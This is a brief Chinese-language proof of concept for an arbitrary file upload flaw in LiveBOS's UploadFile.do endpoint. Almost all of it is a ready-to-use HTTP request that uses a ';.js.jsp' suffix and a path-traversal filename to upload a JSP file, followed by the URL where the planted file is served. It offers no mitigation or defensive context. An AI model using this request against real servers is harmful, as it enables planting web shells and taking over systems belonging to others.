LiveBOS UploadFile.do任意文件上传漏洞

POC：

POST /feed/UploadFile.do;.js.jsp HTTP/1.1 
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi
Connection: close
 
---WebKitFormBoundaryxegqoxxi
Content-Disposition:form-data; name="file"; filename="/../../../../文件名.jsp"
Content-Type: image/jpeg

文件内容
---WebKitFormBoundaryxegqoxxi--

返回地址：

http://ip/文件名.jsp;.js.jsp